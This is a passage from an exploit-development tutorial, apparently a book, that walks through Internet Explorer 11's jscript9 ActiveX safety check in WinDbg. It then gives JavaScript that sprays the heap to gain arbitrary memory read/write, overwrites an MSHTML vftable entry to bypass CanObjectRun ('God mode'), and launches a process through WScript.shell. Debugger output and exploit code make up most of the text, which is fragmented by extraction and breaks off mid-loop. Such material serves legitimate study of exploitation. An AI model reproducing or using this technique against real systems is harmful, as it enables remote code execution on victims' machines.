042bc194 04c95cf5 jscript9!Js::InterpreterStackFrame::Process+0x2c6d
 
042bc29c 034b0fe9 jscript9!Js::InterpreterStackFrame::InterpreterTh
unk<1>+0x305
 
WARNING: Frame IP not in any known module. Following frames may be wrong.
 
042bc2a8 04c91f60 0x34b0fe9
 
042bc328 04c920ca jscript9!Js::JavascriptFunction::CallRootFunction+0x140
 
042bc340 04c9209f jscript9!Js::JavascriptFunction::CallRootFunction
+0x19
 
042bc388 04c92027 jscript9!ScriptSite::CallRootFunction+0x40
 
042bc3b0 04d3df75 jscript9!ScriptSite::Execute+0x61
 
042bc43c 04d3db57 jscript9!ScriptEngine::ExecutePendingScripts+0x1e9
 
042bc4c4 04d3e0b7 jscript9!ScriptEngine::ParseScriptTextCore+0x2ad
 
0
42bc518 6e37b60c jscript9!ScriptEngine::ParseScriptText+0x5b
 
042bc550 6e37945d MSHTML!CActiveScriptHolder::ParseScriptText+0x42
 
042bc5a0 6e36b52f MSHTML!CJScript9Holder::ParseScriptText+0x58
 
042bc614 6e37c6a4 MSHTML!CScriptCollection::ParseScriptText+0x1f0
 
Three lines look particularly interesting:
 
042bbee4 04d5bfae jscript9!ScriptEngine::CanObjectRun+0x78   <
--------------------
 
042bbf30 04d5bde1 jscript9!ScriptSite::CreateObjectFromProgID+0xdf   <
--------------------
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 361 
-
 
042bbf74 04d5bd69 jscript9!ScriptSite:
:CreateActiveXObject+0x56   <
--------------------
 
Maybe the function 
CanObjectRun
 decides if the ActiveX object can run? Let’s delete the previous 
breakpoints and put a breakpoint on 
jscript9!ScriptSite::CreateActiveXObject
:
 
bp jscript9!ScriptSite::CreateA
ctiveXObject
 
When we reload the html page and allow the blocked content in IE, we break on 
CreateActiveXObject
. 
Here’s the code:
 
jscript9!ScriptSite::CreateActiveXObject:
 
04eebd8b 6a18            push    18h
 
04eebd8d b81927eb04      mov     eax,offset jscr
ipt9!memset+0x2ac2 (04eb2719)
 
04eebd92 e88752f2ff      call    jscript9!_EH_epilog3_GS (04e1101e)
 
04eebd97 837d1000        cmp     dword ptr [ebp+10h],0
 
04eebd9b 8b5d08          mov     ebx,dword ptr [ebp+8]
 
04eebd9e 8b5b54          mov     ebx,dword ptr [
ebx+54h]
 
04eebda1 0f8571721600    jne     jscript9!memset+0xf9c1 (05053018)
 
04eebda7 8bcb            mov     ecx,ebx
 
04eebda9 8d75e8          lea     esi,[ebp
-
18h]
 
04eebdac e8f4feffff      call    jscript9!AutoLeaveScriptPtr<IDispatch>::AutoLeaveScriptPtr<
IDispatch> (04eebca5)
 
04eebdb1 8365fc00        and     dword ptr [ebp
-
4],0
 
04eebdb5 8365f000        and     dword ptr [ebp
-
10h],0 ss:002b:0446ba64=0446ba70
 
04eebdb9 896df0          mov     dword ptr [ebp
-
10h],ebp
 
04eebdbc 8d45dc          lea     eax,[ebp
-
2
4h]
 
04eebdbf 50              push    eax
 
04eebdc0 8b45f0          mov     eax,dword ptr [ebp
-
10h]
 
04eebdc3 8bcb            mov     ecx,ebx
 
04eebdc5 e87faaf9ff      call    jscript9!Js::LeaveScriptObject<1,1>::LeaveScriptObject<1,1> (04e86849)
 
04eebdca 8b4d
0c          mov     ecx,dword ptr [ebp+0Ch]
 
04eebdcd 8bc6            mov     eax,esi
 
04eebdcf c645fc01        mov     byte ptr [ebp
-
4],1
 
04eebdd3 8b7508          mov     esi,dword ptr [ebp+8]
 
04eebdd6 50              push    eax
 
04eebdd7 ff7510          pu
sh    dword ptr [ebp+10h]
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 362 
-
 
04eebdda 8bd6            mov     edx,esi
 
04eebddc e8ea000000      call    jscript9!ScriptSite::CreateObjectFromProgID (04eebecb)   <
---------------
 
04eebde1 c645fc00        mov     byte ptr [ebp
-
4],0
 
04eebde5 807de400        cmp  
   byte ptr [ebp
-
1Ch],0
 
04eebde9 8bf8            mov     edi,eax
 
If we step inside 
jscript9!ScriptSite::CreateObjectFromProgID
 we see the following code:
 
jscript9!ScriptSite::CreateObjectFromProgID:
 
04eebecb 8bff            mov     edi,edi
 
04eebecd 55     
         push    ebp
 
04eebece 8bec            mov     ebp,esp
 
04eebed0 83ec34          sub     esp,34h
 
04eebed3 a144630a05      mov     eax,dword ptr [jscript9!__security_cookie (050a6344)]
 
04eebed8 33c5            xor     eax,ebp
 
04eebeda 8945fc          
mov     dword ptr [ebp
-
4],eax
 
04eebedd 53              push    ebx
 
04eebede 8b5d0c          mov     ebx,dword ptr [ebp+0Ch]
 
04eebee1 56              push    esi
 
04eebee2 33c0            xor     eax,eax
 
04eebee4 57              push    edi
 
04eebee5 8b7d08  
        mov     edi,dword ptr [ebp+8]
 
04eebee8 8bf2            mov     esi,edx
 
04eebeea 8975dc          mov     dword ptr [ebp
-
24h],esi
 
04eebeed 8945cc          mov     dword ptr [ebp
-
34h],eax
 
04eebef0 897dd0          mov     dword ptr [ebp
-
30h],edi
 
04eebe
f3 8945d4          mov     dword ptr [ebp
-
2Ch],eax
 
04eebef6 8945d8          mov     dword ptr [ebp
-
28h],eax
 
04eebef9 8945e8          mov     dword ptr [ebp
-
18h],eax
 
04eebefc 85ff            test    edi,edi
 
04eebefe 0f85e26a1600    jne     jscript9!memset+0
xf390 (050529e6)
 
04eebf04 8b4604          mov     eax,dword ptr [esi+4]
 
04eebf07 e8d5000000      call    jscript9!ScriptEngine::InSafeMode (04eebfe1)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 363 
-
 
04eebf0c 85c0            test    eax,eax
 
04eebf0e 8d45ec          lea     eax,[ebp
-
14h]
 
04eebf11 50       
       push    eax
 
04eebf12 51              push    ecx
 
04eebf13 0f84d86a1600    je      jscript9!memset+0xf39b (050529f1)
 
04eebf19 ff1508400905    call    dword ptr [jscript9!_imp__CLSIDFromProgID (05094008)]
 
04eebf1f 85c0            test    eax,eax
 
04eeb
f21 0f88e867fcff    js      jscript9!ScriptSite::CreateObjectFromProgID+0xf6 (04eb270f)
 
04eebf27 8d45ec          lea     eax,[ebp
-
14h]
 
04eebf2a 50              push    eax
 
04eebf2b 8b4604          mov     eax,dword ptr [esi+4]
 
04eebf2e e8e2030000      call
    jscript9!ScriptEngine::CanCreateObject (04eec315)   <
-----------------------
 
04eebf33 85c0            test    eax,eax
 
04eebf35 0f84d467fcff    je      jscript9!ScriptSite::CreateObjectFromProgID+0xf6 (04eb270f)
 
If we keep stepping through the code, we 
get to 
jscript9!ScriptEngine::CanCreateObject
. This function also 
looks interesting. For now, let’s note that it returns 
1
 (i.e. 
EAX = 1
) in this case. We continue to step through 
the code:
 
04eebf3b 6a05            push    5
 
04eebf3d 58              pop   
  eax
 
04eebf3e 85ff            test    edi,edi
 
04eebf40 0f85b66a1600    jne     jscript9!memset+0xf3a6 (050529fc)
 
04eebf46 8d4de4          lea     ecx,[ebp
-
1Ch]
 
04eebf49 51              push    ecx
 
04eebf4a 68ac0fec04      push    offset jscript9!IID_IClas
sFactory (04ec0fac)
 
04eebf4f ff75e8          push    dword ptr [ebp
-
18h]
 
04eebf52 50              push    eax
 
04eebf53 8d45ec          lea     eax,[ebp
-
14h]
 
04eebf56 50              push    eax
 
04eebf57 ff1504400905    call    dword ptr [jscript9!_imp__CoG
etClassObject (05094004)]
 
04eebf5d 85c0            test    eax,eax
 
04eebf5f 0f88aa67fcff    js      jscript9!ScriptSite::CreateObjectFromProgID+0xf6 (04eb270f)
 
04eebf65 8b45e4          mov     eax,dword ptr [ebp
-
1Ch]
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 364 
-
 
04eebf68 8b08            mov     ecx,dw
ord ptr [eax]
 
04eebf6a 8d55e0          lea     edx,[ebp
-
20h]
 
04eebf6d 52              push    edx
 
04eebf6e 68ccbfee04      push    offset jscript9!IID_IClassFactoryEx (04eebfcc)
 
04eebf73 50              push    eax
 
04eebf74 ff11            call    dword pt
r [ecx]      ds:002b:040725f8={wshom!CClassFactory::QueryInterface (04080554)}
 
04eebf76 85c0            test    eax,eax
 
04eebf78 8b45e4          mov     eax,dword ptr [ebp
-
1Ch]
 
04eebf7b 8b08            mov     ecx,dword ptr [eax]
 
04eebf7d 0f89a76a1600    j
ns     jscript9!memset+0xf3d4 (05052a2a)
 
04eebf83 53              push    ebx
 
04eebf84 681c13e104      push    offset jscript9!IID_IUnknown (04e1131c)
 
04eebf89 6a00            push    0
 
04eebf8b 50              push    eax
 
04eebf8c ff510c          call    
dword ptr [ecx+0Ch]  ds:002b:04072604={wshom!CClassFactory::CreateInstance (04080613)}
 
04eebf8f 8bf0            mov     esi,eax
 
04eebf91 8b45e4          mov     eax,dword ptr [ebp
-
1Ch]
 
04eebf94 8b08            mov     ecx,dword ptr [eax]
 
04eebf96 50       
       push    eax
 
04eebf97 ff5108          call    dword ptr [ecx+8]    ds:002b:04072600={wshom!CClassFactory::Release (04080909)}
 
04eebf9a 85f6            test    esi,esi
 
04eebf9c 7818            js      jscript9!ScriptSite::CreateObjectFromProgID+0xe3 (
04eebfb6)
 
04eebf9e 8b4ddc          mov     ecx,dword ptr [ebp
-
24h]
 
04eebfa1 ff33            push    dword ptr [ebx]
 
04eebfa3 8b4904          mov     ecx,dword ptr [ecx+4]
 
04eebfa6 8d55ec          lea     edx,[ebp
-
14h]
 
04eebfa9 e807010000      call    jscri
pt9!ScriptEngine::CanObjectRun (04eec0b5)   <
----------------------
 
04eebfae 85c0            test    eax,eax
 
04eebfb0 0f8467a90800    je      jscript9!ScriptSite::CreateObjectFromProgID+0xfd (04f7691d)   <
---------------
 
04eebfb6 8b4dfc          mov     ec
x,dword ptr [ebp
-
4]
 
04eebfb9 5f              pop     edi
 
04eebfba 8bc6            mov     eax,esi
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 365 
-
 
04eebfbc 5e              pop     esi
 
04eebfbd 33cd            xor     ecx,ebp
 
04eebfbf 5b              pop     ebx
 
04eebfc0 e87953f2ff      call    jscript9!_
_security_check_cookie (04e1133e)
 
04eebfc5 c9              leave
 
04eebfc6 c20800          ret     8
 
Finally, we get to 
jscript9!ScriptEngine::CanObjectRun
. When we step over it, the familiar dialog box pops 
up:
 
 
Let’s click on 
Yes
 and go back in WinDbg. We can see that 
CanObjectRun
 returned 
1
 (i.e 
EAX = 1
). This 
means that the 
je
 at 
04eebfb0
 is not taken and 
CreateObjectFromProgID
 ret
urns. We can see that the 
calculator pops up.
 
Now let’s put a breakpoint right at 
04eebfae
, reload the page in IE and let’s see what happens if we click on 
No
 when the dialog box appears. Now 
EAX
 is 
0
 and 
je
 is taken. If we resume the execution, we can see
 that 
the calculator doesn’t pop up this time.
 
So, if we want to bypass the dialog box, we must force 
CanObjectRun
 to return 
true
 (i.e. 
EAX != 0
). 
Unfortunately, we can’t modify the code because it resides on 
read
-
only pages
. We’ll need to think of 
somethi
ng else.
 
Let’s put a breakpoint on 
jscript9!ScriptEngine::CanObjectRun
 and reload the page in IE. This time, we’re 
stepping inside 
CanObjectRun
:
 
jscript9!ScriptEngine::CanObjectRun:
 
04eec0b5 8bff            mov     edi,edi
 
04eec0b7 55              push    
ebp
 
04eec0b8 8bec            mov     ebp,esp
 
04eec0ba 83ec48          sub     esp,48h
 
04eec0bd a144630a05      mov     eax,dword ptr [jscript9!__security_cookie (050a6344)]
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 366 
-
 
04eec0c2 33c5            xor     eax,ebp
 
04eec0c4 8945f8          mov     dword ptr
 [ebp
-
8],eax
 
04eec0c7 53              push    ebx
 
04eec0c8 8b5d08          mov     ebx,dword ptr [ebp+8]
 
04eec0cb 56              push    esi
 
04eec0cc 57              push    edi
 
04eec0cd 8bf9            mov     edi,ecx
 
04eec0cf 8bf2            mov     esi
,edx
 
04eec0d1 8bc7            mov     eax,edi
 
04eec0d3 8975cc          mov     dword ptr [ebp
-
34h],esi
 
04eec0d6 e806ffffff      call    jscript9!ScriptEngine::InSafeMode (04eebfe1)
 
04eec0db 85c0            test    eax,eax
 
04eec0dd 0f844e581600    je      j
script9!memset+0xe3b4 (05051931)
 
04eec0e3 f687e401000008  test    byte ptr [edi+1E4h],8
 
04eec0ea 0f8450581600    je      jscript9!memset+0xe3c3 (05051940)
 
04eec0f0 8d45bc          lea     eax,[ebp
-
44h]
 
04eec0f3 50              push    eax
 
04eec0f4 e87a0200
00      call    jscript9!ScriptEngine::GetSiteHostSecurityManagerNoRef (04eec373)
 
04eec0f9 85c0            test    eax,eax
 
04eec0fb 0f8838581600    js      jscript9!memset+0xe3bc (05051939)
 
04eec101 8b45bc          mov     eax,dword ptr [ebp
-
44h]
 
04eec104 
8d7dd0          lea     edi,[ebp
-
30h]
 
04eec107 a5              movs    dword ptr es:[edi],dword ptr [esi]
 
04eec108 a5              movs    dword ptr es:[edi],dword ptr [esi]
 
04eec109 a5              movs    dword ptr es:[edi],dword ptr [esi]
 
04eec10a a5   
           movs    dword ptr es:[edi],dword ptr [esi]
 
04eec10b 895de0          mov     dword ptr [ebp
-
20h],ebx
 
04eec10e 33db            xor     ebx,ebx
 
04eec110 53              push    ebx
 
04eec111 6a18            push    18h
 
04eec113 8d55d0          lea  
   edx,[ebp
-
30h]
 
04eec116 52              push    edx
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 367 
-
 
04eec117 8d55cc          lea     edx,[ebp
-
34h]
 
04eec11a 52              push    edx
 
04eec11b 8d55c0          lea     edx,[ebp
-
40h]
 
04eec11e 52              push    edx
 
04eec11f 6868c1ee04      push    o
ffset jscript9!GUID_CUSTOM_CONFIRMOBJECTSAFETY (04eec168)
 
04eec124 895de4          mov     dword ptr [ebp
-
1Ch],ebx
 
04eec127 8b08            mov     ecx,dword ptr [eax]
 
04eec129 50              push    eax
 
04eec12a ff5114          call    dword ptr [ecx+14h
]  ds:002b:6ed255f4={MSHTML!TearoffThunk5 (6e1dafe5)}   <
-----------------
---------
 
04eec12d 85c0            test    eax,eax
 
04eec12f 0f8804581600    js      jscript9!memset+0xe3bc (05051939)
 
04eec135 8b45c0          mov     eax,dword ptr [ebp
-
40h]
 
04eec13
8 6a03            push    3
 
When we step over the call at 
04eec12a
, the familiar dialog box pops up. Let’s keep stepping:
 
04eec13a 5b              pop     ebx
 
04eec13b 85c0            test    eax,eax
 
04eec13d 740f            je      jscript9!ScriptEngine::
CanObjectRun+0x99 (04eec14e)
 
04eec13f 837dcc04        cmp     dword ptr [ebp
-
34h],4
 
04eec143 7202            jb      jscript9!ScriptEngine::CanObjectRun+0x92 (04eec147)
 
04eec145 8b18            mov     ebx,dword ptr [eax]
 
04eec147 50              push    e
ax
 
04eec148 ff151c400905    call    dword ptr [jscript9!_imp__CoTaskMemFree (0509401c)]
 
04eec14e 6a00            push    0
 
04eec150 f6c30f          test    bl,0Fh
 
04eec153 58              pop     eax
 
04eec154 0f94c0          sete    al
 
04eec157 8b4df8     
     mov     ecx,dword ptr [ebp
-
8]
 
04eec15a 5f              pop     edi
 
04eec15b 5e              pop     esi
 
04eec15c 33cd            xor     ecx,ebp
 
04eec15e 5b              pop     ebx
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 368 
-
 
04eec15f e8da51f2ff      call    jscript9!__security_check_cookie (04
e1133e)
 
04eec164 c9              leave
 
04eec165 c20400          ret     4
 
Finally, 
CanObjectRun
 returns.
 
Let’s look again at the following three lines of code:
 
04eec127 8b08            mov     ecx,dword ptr [eax]      ; ecx = vftable pointer
 
04eec129 50   
           push    eax
 
04eec12a ff5114          call    dword ptr [ecx+14h]  ds:002b:6ed255f4={MSHTML!TearoffThunk5 (6e1dafe5)}
 
It’s pretty clear that the first line reads the 
vftable
 pointer from the first dword of the object pointed to by 
eax
 
and that, f
inally, the third instruction calls the 6th virtual function (offset 
14h
) in the vftable. Since all vftables 
are located at fixed 
RVAs
, we can locate and modify this vftable so that we can call whetever code we want.
 
Right before the 
call
 at 
04eec12a
, 
eax
 
is clearly non zero, so, if we were to return immediately from 
CanObjectRun
, 
CanObjectRun
 would return 
true
. What happens if we overwrite the 6th pointer of the vftable 
with the value 
04eec164
?
 
What happens is that the call at 
04eec127
 will call the 
epilog
 of 
CanObjectRun
 so 
CanObjectRun
 will end 
and return true. Everything works correctly because, even if the call at 
04eec127
 push a 
ret eip
 on the stack, 
the epilog of 
CanObjectRun
 will restore 
esp
 to the correct value. Remember that 
leave
 is equivalent to 
the 
following two instructions:
 
mov   esp, ebp
 
pop   ebp
 
Let’s put a breakpoint at 
04eec12a
, reload the page in IE and, when the breakpoint is triggered, examine the 
vftable:
 
0:007> ln ecx
 
(6ed255e0)   MSHTML!s_apfnPlainTearoffVtable   |  (6ed25ce8)   MSHT
ML!s_apfnEmbeddedDocTearoffVtable
 
Exact matches:
 
    MSHTML!s_apfnPlainTearoffVtable = <no type information>
 
0:007> dds ecx
 
6ed255e0  6e162681 MSHTML!PlainQueryInterface
 
6ed255e4  6e1625a1 MSHTML!CAPProcessor::AddRef
 
6ed255e8  6e13609d MSHTML!PlainRelease
 
6ed255ec  6e128eb5 MSHTML!TearoffThunk3
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 369 
-
 
6ed255f0  6e30604a MSHTML!TearoffThunk4
 
6ed255f4  6e1dafe5 MSHTML!TearoffThunk5    <
-----------
 we want to overwrite this
 
6ed255f8  6e1d9a77 MSHTML!TearoffThunk6
 
6ed255fc  6e2b1a73 MSHTML!TearoffThunk7
 
6ed25600  6e1d
770c MSHTML!TearoffThunk8
 
6ed25604  6e1db22c MSHTML!TearoffThunk9
 
6ed25608  6e1db1e3 MSHTML!TearoffThunk10
 
6ed2560c  6e307db5 MSHTML!TearoffThunk11
 
6ed25610  6e1db2b8 MSHTML!TearoffThunk12
 
6ed25614  6e3e2a3d MSHTML!TearoffThunk13
 
6ed25618  6e2f2719 MSHTML!
TearoffThunk14
 
6ed2561c  6e304879 MSHTML!TearoffThunk15
 
6ed25620  6e1db637 MSHTML!TearoffThunk16
 
6ed25624  6e1e1bf3 MSHTML!TearoffThunk17
 
6ed25628  6e1d9649 MSHTML!TearoffThunk18
 
6ed2562c  6e558422 MSHTML!TearoffThunk19
 
6ed25630  6e63bc4a MSHTML!TearoffThu
nk20
 
6ed25634  6e1e16d9 MSHTML!TearoffThunk21
 
6ed25638  6e397b23 MSHTML!TearoffThunk22
 
6ed2563c  6e2c2734 MSHTML!TearoffThunk23
 
6ed25640  6e3975ed MSHTML!TearoffThunk24
 
6ed25644  6e5728c5 MSHTML!TearoffThunk25
 
6ed25648  6e475a7d MSHTML!TearoffThunk26
 
6ed25
64c  6e456310 MSHTML!TearoffThunk27
 
6ed25650  6e46ff2d MSHTML!TearoffThunk28
 
6ed25654  6e45a803 MSHTML!TearoffThunk29
 
6ed25658  6e47d81a MSHTML!TearoffThunk30
 
6ed2565c  6e2d3f19 MSHTML!TearoffThunk31
 
Determining the RVA of the vftable is quite easy:
 
0:007>
 ? MSHTML!s_apfnPlainTearoffVtable
-
mshtml
 
Evaluate expression: 12932576 = 00c555e0
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 370 
-
 
Now let’s find the RVA of the epilog at 
04eec164
:
 
0:007> !address 04eec164
 
 
Mapping file section regions...
 
Mapping module regions...
 
M
apping PEB regions...
 
Mapping TEB and stack regions...
 
Mapping heap regions...
 
Mapping page heap regions...
 
Mapping other regions...
 
Mapping stack trace database regions...
 
Mapping activation context regions...
 
 
Usage:                  Image
 
Base Address:
           04e11000
 
End Address:            05094000
 
Region Size:            00283000
 
State:                  00001000  MEM_COMMIT
 
Protect:                00000020  PAGE_EXECUTE_READ
 
Type:                   01000000  MEM_IMAGE
 
Allocation Base:        04e10
000
 
Allocation Protect:     00000080  PAGE_EXECUTE_WRITECOPY
 
Image Path:             C:
\
Windows
\
SysWOW64
\
jscript9.dll
 
Module Name:            jscript9      <
----------------------------------------------
 
Loaded Image Name:      C:
\
Windows
\
SysWOW64
\
jscript9
.dll
 
Mapped Image Name:      
 
More info:              lmv m jscript9
 
More info:              !lmi jscript9
 
More info:              ln 0x4eec164
 
More info:              !dh 0x4e10000
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 371 
-
 
 
0:007> ? 04eec164
-
jscript9
 
Evaluate expression: 901476 = 000dc164
 
So the
 vftable is at 
mshtml + 0xc555e0
 and we need to overwrite the dword at 
mshtml + 0xc555e0 + 0x14
 
with the value 
jscript9 + 0xdc164
. Let’s see the javascript code to do this:
 
JavaScript
 
 
// We want to overwrite mshtml+0xc555e0+0x14 with jscript9+0xdc164 
where:
 
    
//   * mshtml+0xc555e0 is the address of the vftable we want to modify;
 
    
//   * jscript9+0xdc164 points to the code "leave / ret 4".
 
    
// As a result, jscript9!ScriptEngine::CanObjectRun returns true.
 
 
var
 
old
 
=
 
read
(
mshtml
+
0xc555e0
+
0x
14
);
 
    
write
(
mshtml
+
0xc555e0
+
0x14
,
 
jscript9
+
0xdc164
);
      
// God mode on!
 
    
shell
 
=
 
new
 
ActiveXObject
(
"WScript.shell"
);
 
    
shell
.
Exec
(
'calc.exe'
);
 
 
write
(
mshtml
+
0xc555e0
+
0x14
,
 
old
);
      
// God mode off!
 
 
Note that the code restores the vft
able as soon as possible (
God mode off!
) because the altered vftable 
would lead to a crash in the long run.
 
Here’s the full code:
 
XHTML
 
 
<html>
 
<head>
 
<script
 language=
"javascript"
>
 
  
(
function
()
 
{
 
    
alert
(
"Starting!"
);
 
 
//
--------------------------
---------------------------
 
    
// From one
-
byte
-
write to full process space read/write
 
    
//
-----------------------------------------------------
 
    
a
 
=
 
new
 
Array
();
 
    
// 8
-
byte header | 0x58
-
byte LargeHeapBlock
 
    
// 8
-
byte header | 0x58
-
byte LargeH
eapBlock
 
    
// 8
-
byte header | 0x58
-
byte LargeHeapBlock
 
    
// .
 
    
// .
 
    
// .
 
    
// 8
-
byte header | 0x58
-
byte LargeHeapBlock
 
    
// 8
-
byte header | 0x58
-
byte ArrayBuffer (buf)
 
    
// 8
-
byte header | 0x58
-
byte LargeHeapBlock
 
    
// .
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 372 
-
 
    
// .
 
    
// 
.
 
    
for
 
(
i
 
=
 
0
;
 
i
 
<
 
0x200
;
 
++
i
)
 
{
 
      
a
[
i
]
 
=
 
new
 
Array
(
0x3c00
);
 
      
if
 
(
i
 
==
 
0x80
)
 
        
buf
 
=
 
new
 
ArrayBuffer
(
0x58
);
      
// must be exactly 0x58!
 
      
for
 
(
j
 
=
 
0
;
 
j
 
<
 
a
[
i
].
length
;
 
++
j
)
 
        
a
[
i
][
j
]
 
=
 
0x123
;
 
    
}
 
    
//    0x0:  ArrayDat
aHead
 
    
//   0x20:  array[0] address
 
    
//   0x24:  array[1] address
 
    
//   ...
 
    
// 0xf000:  Int32Array
 
    
// 0xf030:  Int32Array
 
    
//   ...
 
    
// 0xffc0:  Int32Array
 
    
// 0xfff0:  align data
 
    
for
 
(;
 
i
 
<
 
0x200
 
+
 
0x400
;
 
++
i
)
 
{
 
      
a
[
i
]
 
=
 
new
 
Array
(
0x3bf8
)
 
      
for
 
(
j
 
=
 
0
;
 
j
 
<
 
0x55
;
 
++
j
)
 
        
a
[
i
][
j
]
 
=
 
new
 
Int32Array
(
buf
)
 
    
}
 
    
//            vftptr
 
    
// 0c0af000: 70583b60 031c98a0 00000000 00000003 00000004 00000000 20000016 08ce0020
 
    
// 0c0af020: 03133de0                 
                            array_len buf_addr
 
    
//          jsArrayBuf
 
    
alert
(
"Set byte at 0c0af01b to 0x20"
);
 
    
// Now let's find the Int32Array whose length we modified.
 
    
int32array
 
=
 
0
;
 
    
for
 
(
i
 
=
 
0x200
;
 
i
 
<
 
0x200
 
+
 
0x400
;
 
++
i
)
 
{
 
     
for
 
(
j
 
=
 
0
;
 
j
 
<
 
0x55
;
 
++
j
)
 
{
 
        
if
 
(
a
[
i
][
j
].
length
 
!=
 
0x58
/
4
)
 
{
 
          
int32array
 
=
 
a
[
i
][
j
];
 
          
break
;
 
        
}
 
      
}
 
      
if
 
(
int32array
 
!=
 
0
)
 
        
break
;
 
    
}
 
    
if
 
(
int32array
 
==
 
0
)
 
{
 
      
alert
(
"Can't find int32array!"
);
 
      
window.location.reload
();
 
      
return
;
 
    
}
 
    
// This is just an example.
 
    
// The buffer of int32array starts at 03c1f178 and is 0x58 bytes.
 
    
// The next LargeHeapBlock, preceded by 8 bytes of header, starts at 03c1f1d8.
 
    
// The value in
 parentheses, at 03c1f178+0x60+0x24, points to the following
 
    
// LargeHeapBlock.
 
    
//
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 373 
-
 
    
// 03c1f178: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
 
    
// 03c1f198: 00000000 00000000 00000000 00000000 00000000 00000000 00000
000 00000000
 
    
// 03c1f1b8: 00000000 00000000 00000000 00000000 00000000 00000000 014829e8 8c000000
 
    
// 03c1f1d8: 70796e18 00000003 08100000 00000010 00000001 00000000 00000004 0810f020
 
    
// 03c1f1f8: 08110000(03c1f238)00000000 00000001 00000001 000
00000 03c15b40 08100000
 
    
// 03c1f218: 00000000 00000000 00000000 00000004 00000001 00000000 01482994 8c000000
 
    
// 03c1f238: ...
 
 
// We check that the structure above is correct (we check the first LargeHeapBlocks).
 
    
// 70796e18 = jscript9!Lar
geHeapBlock::`vftable' = jscript9 + 0x6e18
 
    
var
 
vftptr1
 
=
 
int32array
[
0x60
/
4
],
 
        
vftptr2
 
=
 
int32array
[
0x60
*
2
/
4
],
 
        
vftptr3
 
=
 
int32array
[
0x60
*
3
/
4
],
 
        
nextPtr1
 
=
 
int32array
[(
0x60
+
0x24
)/
4
],
 
        
nextPtr2
 
=
 
int32array
[(
0x60
*
2
+
0x24
)/
4
],
 
 
nextPtr3
 
=
 
int32array
[(
0x60
*
3
+
0x24
)/
4
];
 
    
if
 
(
vftptr1
 
&
 
0xffff
 
!=
 
0x6e18
 
||
 
vftptr1
 
!=
 
vftptr2
 
||
 
vftptr2
 
!=
 
vftptr3
 
||
 
        
nextPtr2
 
-
 
nextPtr1
 
!=
 
0x60
 
||
 
nextPtr3
 
-
 
nextPtr2
 
!=
 
0x60
)
 
{
 
      
alert
(
"Error!"
);
 
      
window.location.reload
();
 
  
return
;
 
    
}
  
 
buf_addr
 
=
 
nextPtr1
 
-
 
0x60
*
2
;
 
    
// Now we modify int32array again to gain full address space read/write access.
 
    
if
 
(
int32array
[(
0x0c0af000
+
0x1c
 
-
 
buf_addr
)/
4
]
 
!=
 
buf_addr
)
 
{
 
      
alert
(
"Error!"
);
 
      
window.locati
on.reload
();
 
      
return
;
 
    
}
  
 
int32array
[(
0x0c0af000
+
0x18
 
-
 
buf_addr
)/
4
]
 
=
 
0x20000000
;
        
// new length
 
    
int32array
[(
0x0c0af000
+
0x1c
 
-
 
buf_addr
)/
4
]
 
=
 
0
;
                 
// new buffer address
 
    
function
 
read
(
address
)
 
{
 
      
var
 
k
 
=
 
addres
s
 
&
 
3
;
 
      
if
 
(
k
 
==
 
0
)
 
{
 
        
// ####
 
        
return
 
int32array
[
address
/
4
];
 
      
}
 
      
else
 
{
 
        
alert
(
"to debug"
);
 
        
// .### #... or ..## ##.. or ...# ###.
 
        
return
 
(
int32array
[(
address
-
k
)/
4
]
 
>>
 
k
*
8
)
 
|
 
               
(
int32array
[(
address
-
k
+
4
)/
4
]
 
<<
 
(
32
 
-
 
k
*
8
));
 
      
}
 
    
}
 
    
function
 
write
(
address
,
 
value
)
 
{
 
      
var
 
k
 
=
 
address
 
&
 
3
;
 
      
if
 
(
k
 
==
 
0
)
 
{
 
        
// ####
 
        
int32array
[
address
/
4
]
 
=
 
value
;
 
      
}
 
      
else
 
{
 
        
// .### #... or ..## ##.. or ...# ###
.
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 374 
-
 
        
alert
(
"to debug"
);
 
        
var
 
low
 
=
 
int32array
[(
address
-
k
)/
4
];
 
        
var
 
high
 
=
 
int32array
[(
address
-
k
+
4
)/
4
];
 
        
var
 
mask
 
=
 
(
1
 
<<
 
k
*
8
)
 
-
 
1
;
  
// 0xff or 0xffff or 0xffffff
 
        
low
 
=
 
(
low
 
&
 
mask
)
 
|
 
(
value
 
<<
 
k
*
8
);
 
        
high
 
=
 
(
high
 
&
 
(
0xffffffff
 
-
 
mask
))
 
|
 
(
value
 
>>
 
(
32
 
-
 
k
*
8
));
 
        
int32array
[(
address
-
k
)/
4
]
 
=
 
low
;
 
        
int32array
[(
address
-
k
+
4
)/
4
]
 
=
 
high
;
 
      
}
 
    
}
 
    
//
---------
 
    
// God mode
 
    
//
---------
 
    
// At 0c0af000 we can read the vfptr of an Int32A
rray:
 
    
//   jscript9!Js::TypedArray<int>::`vftable' @ jscript9+3b60
 
    
jscript9
 
=
 
read
(
0x0c0af000
)
 
-
 
0x3b60
;
 
    
// Now we need to determine the base address of MSHTML. We can create an HTML
 
    
// object and write its reference to the address 0x0
c0af000
-
4 which corresponds
 
    
// to the last element of one of our arrays.
 
    
// Let's find the array at 0x0c0af000
-
4.
 
    
for
 
(
i
 
